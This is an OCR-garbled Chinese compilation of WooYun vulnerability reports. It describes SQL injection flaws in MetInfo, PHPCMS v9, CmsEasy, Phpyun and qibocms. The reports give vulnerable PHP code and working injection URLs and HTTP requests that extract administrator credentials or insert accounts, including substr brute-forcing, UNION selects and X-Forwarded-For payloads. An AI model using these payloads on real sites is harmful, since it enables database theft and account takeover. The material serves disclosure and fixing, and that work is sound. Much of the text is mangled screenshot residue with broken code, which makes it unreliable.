http://localhost/Metlnfo/admin/content/feedback/export.php? 
met parameter 1-met admin table -- ;&class1-21&settings arr[0] 
[columnid]21&settings arr[O][name]-met parameter 


WITH 

对 于 查询 的 到 的 结果 ， 会 写 入 excel 文 件 内 ， 但 是 因为 列 名 是 规定 得 " 
接 把 admin_table 表 的 password 列 直接 写 进 excel， 但 是 id 是 可 以 的 ， 这 就 足够 进 和 
育 注 了 

漏洞 和 证明 

验证 漏洞 的 存在 : 


1. 其 中 met 为 我 实验 环境 metinfo 的 前 缓 〈 若 要 复线 请 根据 实际 情况 修改 ) ， 
admin_id=0x61646d696e 为 字符 串 'admin'( 过 滤 了 单 引 号 ) 





http://localhost/Metlnfo/admin/content/feedback/export.php? 
met parameter 1-met admin table where admin id-0x61646d696e -- 
;&class1=1&settings arr[O][columnid]21&settings arr[O][name]2met parameter 


然后 测试 一 组 错误 的 ,把 'admin' 改 成 admil 试 斌 


http://localhost/Metlnfo/admin/content/feedback/export.php? 
met parameter 1=met admin table where admin id-0x61646d696c -- 
;&class1-21&settings arr[O][columnid]21&settings arr[O][name]2met parameter 


结果 对 比 图 如 下 


IG http://Localh..met.parameter X | 加 metinfo_ 百 度 搜索 


x | ? 企业 网 站 管理 系统 ,企业 建站 .… x |e ZoomEye - The Cyberspace ... x |Ei Se SR - Metinfo 企 业 网 站 ... 2 | 中 





http://Localhost/MetInfo/admin/content/feedback/export.php?met_parameter_1=met_admin_table where admin_id=0x61646d696e -- ;&class1-1&settings. arr[0] 











| INT |= € SQLY XSSv Encryptionv  Encodingv OtherY 

w Load URL 

® split URL [columnid]=1&settings_arr [0] [name] 2 met. parameter 

» Execute | Opening .xls 
口 Enable Post data [C] Enable Referrer You have chosen to open: 

eo [e localhost/MetInfo/admin/content/feedback/export.ph{ ”加 .xls 





Most Visitedv [Offensive Security Ñ Kali Linux Nal 


met_parameterFPDF error: Data has already been sent, | 


| i http://localh...met_parameter X | 加 metinfo_ 百 度 搜索 


which is: Microsoft Excel 工作 簿 (2.7 KB) 
from: http://localhost 


What should Iceweasel do with this file? 





OY Google ata 








(e) lOpen with | LibreOffice Calc (default) 


O Save File 


口 Do this automatically for files Like this from now on. 


| @ Cancel | | ok | 








www.wooyun.org 


x | 9 企业 网 站 管理 系统 ,企业 建站 .… x | © ZoomEye - The Cyberspace... 3 | 加 后 台 登 录 - Metinfo 企 业 网 站 .… x | + 
| INT |= € SQLY XSSv EncryptionY EncodingY OtherY 





4& Load URL 
Q Split URL 


» Execute 





C Enable Post data [C] Enable Referrer 





$° | @ Localhost/MetInfo/admin/content/feedback/export.ph| 





ÉxMost Visitedv [Offensive Security Ñ Kali Linux "Ñ Kal 


met parameterFPDF error: Data has already been sent, i 


You have chosen to open: 
LJ .xls 


which is: Microsoft Excel 工作 簿 (2.7 KB) 
from: http://Localhost 


What should Iceweasel do with this file? 





® Open with | LibreOffice Calc (default) 


O Save File 


[C Do this automatically for files like this fron 


| e c: 





http://Localhost/MetInfo/admin/content/feedback/export.php?met.parameter..1-met admin. table where admin_id=0x61646d696c -- ;&class1=1&settings_arr [0] 
[columnid] 2 1&settings..arr [0] [name] 2 met. parameter 


Opening .xls 
You have chosen to open: 
器 .xls 


which is: Microsoft Excel T fF$& (2.6 KB) 
from: http://Localhost 


What should Iceweasel do with this file? 





€ Open with | LibreOffice Calc (default) ?| 
O Save File 


C Do this automatically for files Like this from now on. 





| @ cancel | | oK | 
— — — —wWN-Wooyun. 


可 以 看 到 两 个 文件 的 大 小 是 不 一 样 滴 ， 给 大 家 看 看 这 个 excel 里 到 底 有 啥 区别 








File Edit View Insert Format Tools Data Window Help 

: [3] - G8 - i c9 LE 1 RR (LP E136 6s 65-61 5- § \|\O@nNRilbviCGEEIO 

: fad [Droid Sans Fallbac] fio -] B/U x | AS JJA | 8 96 92 Ml ez e |] - $9 - A- 
pa — |, E- | a — 








-5.xls - LibreOffice Calc 


“File Edit View Insert Format Tools Data Window Help 





D E- c9 1E Lm ISP Ea 5S 6-961 5- 5-19 illy) ael 
Mcr [Droid Sans Fallbac] fio -] B/UIEzsesze AS |A| I% $53 9$ | ez 4| 1 $1 - A- 
[a -] AZ [xem 

- i 






www.wooyun. org 


step1 : 暴力 破解 metinfo 前 组 


用 brup 进 行 破解 ， 这 个 不 用 我 多 解释 了 把 ， 根 据 返回 大 小 


http://localhost/MetInfo/admin/content/feedback/export.php? 
met_parameter_1=met_admin_table -- ;&class1=1&settings_arr[0] 
[columnid]=1&settings_arr[O][name]=met_parameter 


step2 : 破解 admin 账 户 
还 是 brup， 用 substr 一 个 个 来 


http://localhost/MetInfo/admin/content/feedback/export.php? 
met_parameter_1=met_admin_table where substr(admin_id,1,1)=0x61 -- 
;&class1=1&settings _arr[O][columnid]=1&settings_arr[O][name]=met_parameter 


step3 : 破解 admin 密 码 
同上 


http://localhost/MetInfo/admin/content/feedback/export.php? 
met_parameter_1=met_admin_table where admin_id=0x61646d696e and 
substr(admin_pass,1,1)=0x32 -- ;&class1=1&settings arr[0] 
[columnid]=1&settings_arr[O][name]=met_parameter 


15 o o 

修复 方案 

1. include check_login 

2. export.php 的 那个 危险 的 $$ 注意 下 

3. 打 沉 点 rank 吧 ， 我 不 用 当 路 人 甲 阿 。。。 


WooYun-2014-50636 : PHPCMS 全 版 本 通 杀 SQL 
注入 漏洞 


漏洞 作者 : felixk3y 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-050636 


fal i 要 描述 还 


上 次 你 们 太 不 给 力 了 ,这 次 再 来 个 通 杀 v9 的 SQL 注入 ,包括 最 新 V9.5.3 版 本 
详细 说 明 


漏洞 产生 


总 的 来 说 ， 是 因为 你 们 修复 不 完善 ， 并 没有 理解 到 这 个 SQL 注 入 的 申 正 原因 ,同时 
补丁 后 并 没有 进行 相应 的 测试 因而 可 绕 过 补丁 继续 注入 ... 


漏洞 分 析 


首先 看 下 面 的 代码 


/phpcms/modules/member/content.php 20241 edit žk 


public function edit() { 

$ username = $this->memberinfo[ 'username' ]; 

if(isset($ POST['dosubmit'])) { 
$catid = $ POST['info']['catid'] = intval($ POST['info']['« 
$siteids = getcache('category content', 'commons'); 
$siteid = $siteids[$catid]; 
$CATEGORYS = getcache('category_content_'.$siteid, 'common: 
$category = $CATEGORYS[S$catid]; 


if($category['type']==0) {// 审 核 状态 时 ， 点 编辑 再 提交 ， 进 入 if 分 3 


} 
} else { 


$id = intval($_POST['id']); 
$catid = $ POST['info']['catid'] = intval($ POST['info 
$this-»-content db = pc base::1load model('content model 
$modelid - $category['modelid']; 
$this->content_db->set_model($modelid) ; 
// 判 断 会 员 组 投稿 是 否 需 要 审核 
$memberinfo = $this->memberinfo; 
$grouplist = getcache('grouplist'); 
$setting = string2array($category['setting']); 
if(!$grouplist[$memberinfo[ 'groupid']]['allowpostverif\ 
$ POST['info']['status'] = 1; 
j 
$info - array(); 
foreach($ POST['info'] as $ k-»$ v) { 
if(in array($ k, $fields)) $ POST['info'][$ k] = ne 
j 
$ POST linkuri] s^str-replace(array( "(yr ums 
//exit(print r($ POST['info'])); 
$this-»-content db-»edit content($ POST['info'],$id); 
$forward - $ POST['forward']; 


showmessage(L('update success'),$forward); 


OA 








229 行 


$this->content_db->edit_content($_POST['info'],$id); 


其 中 $_ POST[info] 参数 是 一 个 数组 ， 其 内 容 是 在 线 投稿 的 各 项 内 容 ， 如 图 所 示 








« www. vulns. org/phpcms/index. php?m=member&c=content! C v Google ys 4 A S |v 


Array ( [catid] => 6 [title] => test [keywords] => test [copyfrom] => test 


[description] => test [content] => test [thumb] => http://www. vulns. org/sql. jpg 


[islink] => 1 [status] => 1) 1 


www.wooyun.org 
好 了 ， 接 下 来 我 们 看 看 这 些 数据 都 经 过 了 怎样 的 处 理 .… 
跟 上 edit_content 函 数 


/phpcms/model/content_model.class.php 第 234 行 开始 


public function edit_content($data,$id) { 
$model_tablename = $this->model_tablename; 
// 前 台 权 限 判 断 
if(!defined('IN ADMIN')) { 
$ username - param::get cookie(' username'); 
$us = $this-»get one(array('id'-»$id,'username'-»$ use! 
if(!$us) return false; 
j 
$this-»search db = pc base::1load model('search model'); 
require once CACHE MODEL PATH.'content input.class.php'; 
require once CACHE MODEL PATH.'content update.class.php'; 
$content input = new content input($this-»modelid); 
$inputinfo = $content input-»get($data);//J&3t 96 HH 
// /caches/caches_model/caches_data/content_input.class. phy 


$systeminfo = $inputinfo['system']; 








第 248 行 ， 我 们 可 以 看 到 $_ POST['info'] 数组 进入 了 get 函数 ， 继 续 跟 进 


/caches/caches_model/caches_data/content_input.class.php 第 55 行 开始 


if($pattern && $length && !preg_match($pattern, $value) && !$isimpc 
$MODEL = getcache('model', 'commons'); 
$this->db->table_name = $this->fields[$field]['issystem'] ? $this-: 
if($this->fields[$field]['isunique'] && $this->db->get_one(array($1 
$func = $this->fields[$field]['formtype']; 
if(method_exists($this, $func)) $value = $this->$func($field, $valt 
if($this->fields[$field]['issystem']) { 

$info['system'][$field] = $value; 
) else { 


$info['model'][$field] = $value; 


E EN 


我 们 重点 关注 这 里 是 怎么 处 理 的 





if(method_exists($this, $func)) $value = $this->$func($field, $vall 
| m : 


为 了 方便 看 清楚 程序 在 这 里 究 竞 是 怎样 处 理 的 ,我 们 在 这 行 代码 前 面 加 入 以 下 调试 代 
码 ， 看 看 都 经 过 了 哪些 函数 的 处 理 ... 





if($pattern && $length && !preg_match($pattern, $value) && !$isimpc 
$MODEL = getcache('model', 'commons'); 
$this->db->table_name = $this->fields[$field]['issystem'] ? $this-> 
if($this->fields[$field]['isunique'] && $this-»db-»get one(array($! 
$func = $this->fields[$field]['formtype']; 
echo "<br>Function :-->".$func."<--<br>";// 这 是 添加 的 调试 代码 
if(method_exists($this, $func)) $value = $this->$func($field, $valt 
if($this->fields[$field]['issystem']) { 

$info['system'][$field] = $value; 
} else { 


$info['model'][$field] = $value; 





} 
p E) 
编辑 投稿 内 容 ， 提 交 
& www. vulns. org/phpcms/ index. php?m=member&c=contentha=edi thcati d=t (e v Google » 4 A at 
Function :-->catid<—- 


Function :-—title&-- 


Function :-—keywordi-- 


Function :--—^copyfromí-- 
Function :-->textarea<—— 
Function :-->editor<—— 
Function :--^imagec-- 


Function :-->islink<—— 


Function :——>box<—— www.wooyun.org 


看 见 了 吧 ， 我 们 提交 的 内 容 经 过 了 如 下 几 个 函数 catid title keyword copyform 
textarea editor image islink box 


经 过 分 析 后 ， 我 们 重点 关注 Image 函数 ， 继 续 跟 上 


/caches/caches_model/caches_data/content_input.class.php 第 102 行 image 函数 


function image($field, $value) { 
$value = str replace(array("'",'"','(',')'),'', $value); 


return trim($value); 


过 滤 了 "™、"("、")", 但 是 呢 我 们 知道 当 开 启 了 GPC 的 时 候 ， 单 引号 会 被 转 义 '-->\ 


明白 了 吧 ? j dau HALT PAF > 假设 我 们 提交 的 数据 恰巧 经 过 了 image 有 函数 ， 
则 单 引 号 被 过 滤 了 ， 留 下 "\， 那 么 这 个 "将 会 吃 掉 一 个 单 引 号 ,造成 注入 


漏洞 Poc 


条 件 : 后 台 开 局 投稿 ， 并 要 求 审核 
step1 在 会 员 中 心 随 便 投 一 篇 文章 ， 提 交 
step2 点 击 编辑 ， 如 下 


已 发 布 稿件 
ID 标题 栏目 添加 时 间 操作 
1 test 待 审 中 国内 2014-02-11 删除 


www.wooyun.org 


step3 7 44% A 7238 A http://**.**.**.**/sql.jog' * 4» A 





加 是否 截 职 内 容 |200_“ 售 符 至 内 容 摘要 ERARAS PEREA 


缩 略 图 : | http:/Pwww .vulns.org/sal.jpg' LEER 








志向 链接 : 站 
Pelee 外 转向 链接 www.wooyun.org 
提交 后 ， 报 错 了 
€)@ www. vulns. or g/phpens/ index. php?nznenber&czcontent&a-edi t&cati d=Bihi d= aad 图 7 Google P + 会 2- 








AySOL Query : UPDATE "phpcmsy9 .YY9_news` SET 'catid'z'5''style'-""title'z'test' keywords`=test, description =testthumb -'http/www.vulns.org 
‘sql put, "islink'z'0'"status'z'1'"inputtime'-'1382085512', "updatetime'- 4382085512", “url= "http:iwwwevulns. orgíphpems/index php?m-content&c- index&a=show&catid=6 &id=1' WHERE “id* = 










MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
‘0'status ="1" inputtime ="1392085512' Updatetime ="139208551 2’ url'='http.! at line 1 

MySQL Errno : 1064 

Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 

‘0’ status "1 '"inputtime'21 39208551 2''updatetime'-1 39208551 2''url'z'http;/ at line 1 


Need Help? 
www.wooytun. org 








Hh T8] ic 2A ^| A Exp 


在 缩 略 图 栏 填 入 : http;/**.**.** **/sql.jpg' 


i PHP 常见 漏洞 


RR] (173 


点 击 提交 ， 采 用 Tamper data 抓 包 修改 ， 将 infofislink] 修 改 为 


,title-(select concat(username, password) from v9 admin where useric 


E PRSE 





点 击 确定 ， 再 点 编辑 即 可 读 取 管理 员 账 号 密码 ， 如 图 


TERA 
”栏目 : 
”标题 : 
x: 


来 源 : 


Hey i] LE BH 


HERE 
* 栏目 : 
* 标题 : 
zB]: 
来 源 : 
摘要 
4^5 c3 
修复 方案 
必须 给 力 啊 


国内 


admin711092aa95d961d840b3el8fl368fa50 


test 
test 


test 


还 可 输入 255 个 字符 


国内 


admin711092aa95d961d840b3e18f1368fa59 


test 
test 


test 


还 可 输入 255 个 字符 


JUN DU 


还 可 输入 80 个 字符 
多 关键 司 之 间 用 空格 或 者 ， 隅 开 


www.wooyun.org 


还 可 输入 80 个 字符 
多 关键 局 之 间 用 空格 或 者 ， 隅 开 


三 请 选择 三 v 


www.wooyun.org 


WooYun-2014-53198 : cmseasy 绕 过 补丁 SQL 注 
入 一 枚 


Y 
漏洞 作者 : ' 雨 。 V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-053198 
简要 描述 

继续 注入 。 

详细 说 明 

在 lib\plugins\pay\alipay.php 中 。 


上 次 提 了 这 个 文件 的 洞 。 


看 了 看 官网 发 的 补丁 。 


foreach($_POST as $key =>$data) { 
if(preg_match('/(=|<|>)/', $data) ){ 


return false; 


就 是 过 滤 了 几 个 运算 符 。 但 是 因为 语句 是 where xxx ° 


me 


一 般 的 注入 的 话 需要 Where id=xxx 来 注入 但 是 这 里 过 滤 了 这 些 。 没 想 出 什么 办 法 


突破 。 


但 是 在 这 文件 还 有 一 个 函数 。 


$payment = pay::get payment($ GET['code']); 
$seller email - rawurldecode($ GET['seller email']); 
$order sn = str replace($ GET['subject'],'',$ GET['out tra 
$order sn = trim($order sn); 
if (!pay::check money(S$order sn,$ GET['total fee'])) { 
return false; 
j 
if($ GET['trade status'] == "WAIT. SELLER SEND GOODS"||$ GE 
pay::changeorders($order sn,$ GET); 
return true; 
jelse ( 
return false; 
j 
JE > 
上 次 是 看 的 changeorders 现在 反正 我 是 没 办 法 利用 了 。 
那 现 在 来 看 看 check_money 





public static function check_money($id,$money) { 
$where=array(); 
$where['id']-$id; 
$orders=orders: :getInstance()->getrow($where); 
$archive=archive: :getInstance()->getrow($orders['aid']); 
$prices = getPrices($archive['attr2']); 


$archive['attr2'] = $prices['price']; 


可 以 看 到 是 把 order_ sn 带 入 了 getrow; 再 继续 


function getrow($condition,$order='1 desc',$cols-'*') { 
$this->condition($condition); 


return $this->rec_select_one($condition, '*',$order); 


function sql_select($tbname, $where="", $limit=0, $Ffields="*", $order= 

$sql-"SELECT ".$fields." FROM "".$tbname."^ ".($where ?" Wl 
//echo $sql."<br>"; 
return $sql; 

EE 

这 里 来 把 语句 输出 一 下 看 看 。 

SELECT * FROM cmseasy_p_orders WHERE id ='123aaaa' 

被 单 引 号 了 。 但 是 又 全 局 转 义 怎么 办 呢 ? 

看 $order sn = str replace($ GET['subject],"$ GET[out trade no'); 





$order sn = trim($order sn); 

这 里 跟 ecshop AB 4-94 4$ © 

在 这 里 d 是 xx 把 清空 49. 3x IS Xxx re ANT T FE 
总 所 周知 9900 转 义 后 会 变 成 \0 然后 %00' 就 是 \OV 


这 里 如 果 我 们 把 0 清空 的 话 就 成 了 \' 单 引号 成 功 出 来 。 
测试 测试 。 


Hey i] HE PA 


x) Load URL http://127.0.0.1/cmseasy/index.php/admin/?case-archive&act-respond&code-alipay&trade status- WAIT SELLER SEND GOODS 2 
X Spit URL + 
b Execute 

[V] Enable Post data [E] Enable Referrer 
Post data 


out_trade_no=aa%00' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from cmseasy_user#&subject=0 


SELECT * FROM cmseasy_settings WHERE tag =’ table-fieldset’ ORDER BY 1 desc limit 1SELECT * FROM 
“emseasy_user WHERE userid>0 ORDER BY 1 desc limit 1SELECT * FROM cmseasy_archive WHERE state IS NULL or 
state<>’-1’ ORDER BY 1 desc limit 1SELECT * FROM cmseasy_user WHERE “userid =’ 1’ ORDER BY 1 desc limit 


ORDER BY 1 desc limit 1SELECT * FROM ` emseasy ~archive WHERE “aid -'3' and (state IS NULL or 
state<>’-1’) ORDER BY 1 desc limit 1UPDATE emseasy p. orders. SET “id = ’aa\\’ union select 


4, 5, 6, 7, 8, 9, 1, 11, 12,13 from cmseasy_user#’, status = X WHERE aa\\’ qu select 
1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 11, 12,13 from cmseasy_user# 改 变 订单 状态 出 错 ， SERSSA 


WWW.Wooyun.org 


执行 的 语句 有 点 多 。。 直接 全 部 输出 来 了 。 
是 成 功 的 哦 。 


WooYun-2014-68853 : Phpyun;x A 7&;F] — 


3 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-068853 
简要 描述 
刚 在 官网 下 的 。 
前 合 注入 。 可 以 直接 出 管理 员 的 帐号 和 密码 。 无 视 360webscan。 
详细 说 明 
本 来 以 为 挖 不 到 了 无 聊 翻 翻 文件 看 看 。 翻 到 了 上 次 那个 注入 的 文件 。 
model/register.class.php 


function regsave action()( 
$ POST-$this-»post trim($ POST); 


$ POST['username']-iconv("utf-8","gbk",$ POST['username' ]), 


$ POST['unit name']-iconv("utf-8","gbk",$ POST['unit name' - 





ip = $this->obj->fun_ip_get(); 
$data['username']-$ POST['username']; 
$data['password' ]-$pass; 
$data['moblie']-$ POST['moblie']; 
$data['email']-$ POST['email']; 
$data['usertype']-$ POST['usertype']; 
$data['status']-$satus; 
$data['salt']-$salt; 
$data['reg date']-time(); 
$data['reg ip']-$ip; 
$data['qqgid']-$ SESSION['qq']['openid']; 
$data['sinaid']-$ SESSION['sinaid']; 


$userid-$this-»0bj-»insert into("member",$data); 


主要 看 到 这 里 ip = $this->obj->fun_ip_get(); 


一 开始 就 是 想 的 会 不 会 有 很 古老 的 xff 洞 ? 后 面 想 了 想 不 太 可 能 把 phpyun 这 程序 目 
测 还 算 不 错 的 。 


可 是 还 是 看 了 看 这 函数 。 
然后 看 到 两 个 文件 里 面 都 声明 了 这 有 函数 


1 在 /include/public.function.php 中 


function fun_ip_get() { 
if (getenv("HTTP CLIENT IP") && strcasecmp(getenv("HTTP CLIENT. 
$ip = getenv("HTTP. CLIENT IP"); 
) else 
if (getenv("HTTP X FORWARDED FOR") && strcasecmp(getenv("H 
$ip = getenv("HTTP. X FORWARDED FOR"); 
) else 
if (getenv("REMOTE ADDR") && strcasecmp(getenv("REMOTE_ 
$ip = getenv("REMOTE ADDR"); 
) else 
if (isset ($ SERVER['REMOTE ADDR']) && $ SERVER['RI 
$ip - $ SERVER['REMOTE ADDR']; 
) else { 
$ip - "unknown"; 
j 
$preg-"/NA((([0-9]?[0-9])] (1[60-9](23)1 (2[0-4][0-9])] (25[0-5]): 
if(preg match($preg, $ip) ){ 


return ($ip); 


BJE 


这 个 文件 里 面 的 这 函数 验证 了 。 





2  [model/class/action.class.php 


function fun_ip_get() { 
if (getenv("HTTP CLIENT IP") && strcasecmp(getenv("HTTP CL: 
$ip = getenv("HTTP. CLIENT IP"); 
) else 
if (getenv("HTTP X FORWARDED FOR") && strcasecmp(geten\ 
$ip = getenv("HTTP. X FORWARDED_ FOR"); 
) else 
if (getenv("REMOTE ADDR") && strcasecmp(getenv("RE! 
$ip - getenv("REMOTE ADDR"); 
) else 
if (isset ($ SERVER['REMOTE ADDR']) && $ SERVEI 
$ip - $ SERVER['REMOTE ADDR']; 
) else { 
$ip - "unknown"; 
j 
return ($ip); 
E = ao 
而 这 /model/class/action.class.php 文 件 里 面 的 却 没 验 证 ip 是 否 合 法 。。 
而 刚才 调用 的 函数 就 是 调用 的 这 文件 里 面 的 。。。。。 
再 堡 了 。。 


继续 在 model/register.class.php 里 面 看 。 





$ip = $this->obj->fun_ip_get(); 
$data['username']-$ POST['username']; 
$data['password' ]=$pass; 
$data['moblie']-$ POST['moblie']; 
$data['email']-$ POST['email']; 
$data['usertype']-$ POST['usertype']; 
$data['status']-$satus; 
$data['salt']-$salt; 
$data['reg date']-time(); 
$data['reg ip']-$ip; 
$data['qqgid']-$ SESSION['qq']['openid']; 
$data['sinaid']-$ SESSION['sinaid']; 


$userid-$this-»0bj-»insert into("member",$data); 


然后 就 带 入 到 了 insert 当 中 


function insert_into($table, $data=array()){ 


$value=""; 


$FieldSQL = "SELECT 'COLUMN NAME FROM INFORMATION_SCHEMA. ( 
$Fquery = $this->db->query($FieldSQL) ; 
while($Frow=$this->db->fetch_array($Fquery) ){ 


$Freturn[ ]=$Frow; 





j 
if(is_array($Freturn) ) 
{ 
foreach($Freturn as $Fkey=>$Fval) 
{ 
$fields[] = $Fval['COLUMN_NAME']; 
j 
if(is_array($data) ){ 
foreach($data as $key=>$v) { 
if(in array($key, $fields)) 
{ 
$v = $this->FilterStr($v); 
$value[]z2"'"".$key.""z'".mysql real escape : 
剧 


可 是 在 这 里 mysql real escape string 转 义 了 没 办 法 用 。 
在 找 找 其 他 哪个 文件 调用 了 这 函数 。 
在 modellogin.class.php 中 


function loginsave action() 


( 


$username-iconv("utf-8","gbk",$ POST['username']); 


if($ cooKrE['uid']!-""&&$ COOKIE['username']!-"") 


{ 
$this->ajaxlogin($_POST['comid'],"*& LAZET > BREA, 
echo "您 已 经 登录 了 !"sdie; 
j 
if($_POST[ 'path' ]!="index") 
{ 
if(strstr($this->config["code_web"], ' 前 全 登陆 ' )) 
{ 
if(md5($ POST["authcode"])!-$ SESSION["authcode"]) 
{ 
$this->ajaxlogin($_POST['comid'], "EEA 4474 1"); 
echo "验证 码 错 误 1";die;， 
} 
} 





$time = time(); 
$ip = $this->obj->fun_ip_get(); 
$this-»0bj-»DB update all("member","^l 


$this->unset_cookie(); 


$this->add_cookie($user['uid'],$user['t 


«| 5 
然后 在 这 里 








$this->obj->fun_ip_get(); 再 次 调用 了 这 有 函数 ， 
进入 DB update all 
function DB_update_all($tablename, $value, $where = 1){ 
$SQL = "UPDATE `" . $this-»def . $tablename . "^ SET $value 
$this->db->query("set sql mode-''"); 
$returnz$this-»db-»query($SQL); 
return $return; 
j 
这 函数 里 没有 转 义 所 以 可 以 直接 来 注入 了 。 


而 且 由 于 可 控 的 是 在 Set 位 所 以 我 们 可 以 想 update 哪个 column 就 Update 哪个 
column ° 





这 里 我 们 update 一 下 email. 
再 来 看 一 下 360webscan。 


foreach($ GET as $key=>$value) { 


webscan_StopAttack ($key, $value, $getfilter,"GET"); 


} 


if ($webscan_post) { 
foreach($_POST as $key=>$value) { 


webscan_StopAttack ($key, $value, $postfilter, "POST"); 


} 


if ($webscan_cookie) { 
foreach($ COOKIE as $key=>$value) { 


webscan_StopAttack($key, $value, $cookiefilter, "COOKIE"); 


j 


if ($webscan referre) (1 
foreach($webscan_referer as $key=>$value) { 


webscan_StopAttack($key, $value, $postfilter, "REFERRER"); 


检测 了 get post cookie 
server 里 面 只 检测 了 referer 


所 以 xff 的 话 不 用 管 360 。 


漏洞 证明 


论 PHP 常见 漏洞 


pem Wee i Cayan CUIINEDPUSLUD JX 3U35CLI 百 居 素 土 人 "AH UR CXHIDIC LI 
INT y= ẹ SQL XSS- Encryption Encodingy Other- 

4m) Load URL web.com/web/phpyun/index.php?m=login&c=loginsave 
Q spit URL 


































POST ~| http://web.com/webfphpyun/index.php?m-loging&c -loginsave HTTP/1i ~v 
HTTP Headers 
Host: web.com 


























^ 
(S) Execut User-Agent: Mozilla/S.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 
xecute Accept: text/html,application/xhtml+xml, application/xml;g-0.9, */*;g- 0.8 
Enable Post data Enable Referrer Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 
Accept-Encoding: gzip, 
1 Connection: ee 


j wT OK 23 eb = 
Hm ! M | 205730 8ood9744aB etd dcfa102649- 1401528525; inull=403963bhttp%6339628 
%2Fweb.com%3a80%2fchuangxiangcrm%2finc%2ftmenu.php%3ftable=menus 


Y 
nano - mon imme. neon id -Nirn c—CNIOLADA: SEHE T 




















然后 注销 账户 重新 登录 一 次 。 


xlaoyu 

认证 : 
21232f29Ta5TabaT43: 
形象 照片 








WooYun-2014-68853 : Phpyun x A 4 iF] — 110 


WooYun-2014-62957 : CmsEasy 最 新 版 本 无 限制 
SQL 注射 


Y 

漏洞 作者 : blue V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-062957 
简要 描述 


版 本 号 : CmsEasy 5 5 0 20140420_UTF8，SQL 注 射 ， 程 序 员 过 于 追求 完美 时 ， 
会 忽略 那些 值得 珍惜 的 人 或 事 ， 比 如 女 朋 友 (SAA?) ， 比 如 这 一 处 代码 ... 


详细 说 明 


llib/default/user act.php 326 行 左右 ， 及 /lib/tool/front_class.php 541 行 左右 ， 有 对 
ip 有 是否 正 确 的 判断 : 


if(!preg match('/^(([0-9]|][1-9][0-9]|]1[0-9]12) |2[0-4][0-9]|25[0-5]: 


exit(' 来 源 非法 ' ) ; 





而 本 程序 的 ip 获取 是 有 X-Forwarded-For 代理 ip 的 


测试 了 下 程序 ， 用 户 注 册 ， 游 客 投稿 等 都 能 注入 ， 看 漏洞 证 明 堆 图 


漏洞 证 明 


1. 用 户 注 册 注 入 X-Forwarded-For 


| POST lv http://localhost/test/CmsEasy/index.php?case-user&act-regi | HTTP/1.1 - 
HTTP Headers 


Host: localhost 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 

X-Forwarded-For: 127.0.0.1%'), 
('bluego','e10adc3949ba59abbe56e057f20f883e',current user(),1234 
Referer: http://localhost/test/CmsEasy/index.php?case-user 
Cookie: Hm Ivt 60b8d01b69af0ae406497ea0fcd1f9ad- 139601770 
ECS[visit_times]=5; 8xR_lastvisit=1662%091401474467 






",'101','127.0.0.1')}# 


ALIS AAS ME 


M Send POST Content ? 


username=bluegogogo&password=123456&password2=123456&question=&answer=123456& 
e mail-sssss9640sss.com&tel-sdfsd&address-sdfsdfs&verify-2gyxh&submit- --96E696B 396A 896E5 
9686968 C - 





Content-Length: 165 





| Replay | | Close | 


www.wooyun. org 





2. 登录 看 结果 吧 


it PHP 常见 漏洞 


CNASEaSy 5 


通 软件 


ve for Creating value 


个 人 空间 





访问 统计 
注册 用 户 


推广 结算 


A > Se 
修复 方案 


用 户 介 绍 


在 入 库 时 统一 addslashes 最 佳 


ID 4 


FAP  bluego 


电话 123456 


www.wooyun.org 


WooYun-2014-62957 : CmsEasy 3 1 hk A AIR #] SQL 23-449 113 


WooYun-2014-65837 : qibocms 黄页 系统 SQL 注 
入 一 枚 


Y 
漏洞 作者 : UN V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-065837 
简要 描述 
过 滤 不 严 。 
详细 说 明 


http://**.**.**.**/down2.php?v=hy1.0#down 
这 里 下 载 地 址 刚 下 载 的 。 
在 hy/choose pic.php ' 


if ($action=='upload' ) { 
if(is uploaded file($ FILES[postfile][tmp name]))( 
$array[name]=is_array($postfile)?$_FILES[postfile] [name] :$; 
$title=$title?$title:$array[name]; 
$myname_str=explode(".",strtolower($array[name])); 
$myname-$myname str[(count($myname str)-1)]; 
if(!in array($myname,array('gif','jpg'))) $msg="{$array [nar 
$array[path]="$webdb[updir ]/homepage/pic/".ceil($l1fjuid/10( 
$array[size]=is_array($postfile)?$_FILES[postfile] [size] :$; 
$webdb[company uploadsize max]-$webdb[company uploadsize m: 
//if($array[size]»$webdb[company uploadsize max]*1024) X 
if($msg--'')( 
$picurl-upfile(is array($postfile)?$ FILES[postfile][tr 
if($picurl){ 
$Newpicpath=ROOT_PATH."$array[path]/{$picurl}.¢ 
gdpic(ROOT_PATH."$array[path]/$picurl", $Newpicy 
if(!file exists($Newpicpath))( 
COpy(ROOT PATH."$array[path]/1($picurl]", SNe 
j 
//$msg-" ($array [name] ) E42 RA"; 
$picurl="homepage/pic/".ceil($lfjuid/1000) ."/$- 


$title=get_word($title, 32); 


$db->query("INSERT INTO ~{$ prejpic' ( “pid , 





可 以 看 到 $title=get_ word(Stitle,32); 看 看 title 哪 里 来 的 


$title=$title?$title:$array[Iname]; 如 果 没 定义 $title 的 话 就 是 直接 用 上 传 时 候 文 件 的 名 
字 做 的 $ FILES 的 然后 就 无 视 转 义 了 。 


论 PHP 常见 漏洞 
然后 就 带 入 到 了 insert 当 中 。 


漏洞 证 明 


* ||Content-Length: 414 






Content-Length: 764 

Content-Type: text/html; charset=gb2312 
一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 270883142628617 
Content-Disposition: form-data; name="postfile", filena 


数据 库 连 接 出 错 :INSERT INTO "qb hy pic" ( ^pid^ , “psid , 
Content-Type: image/jpeg Š 


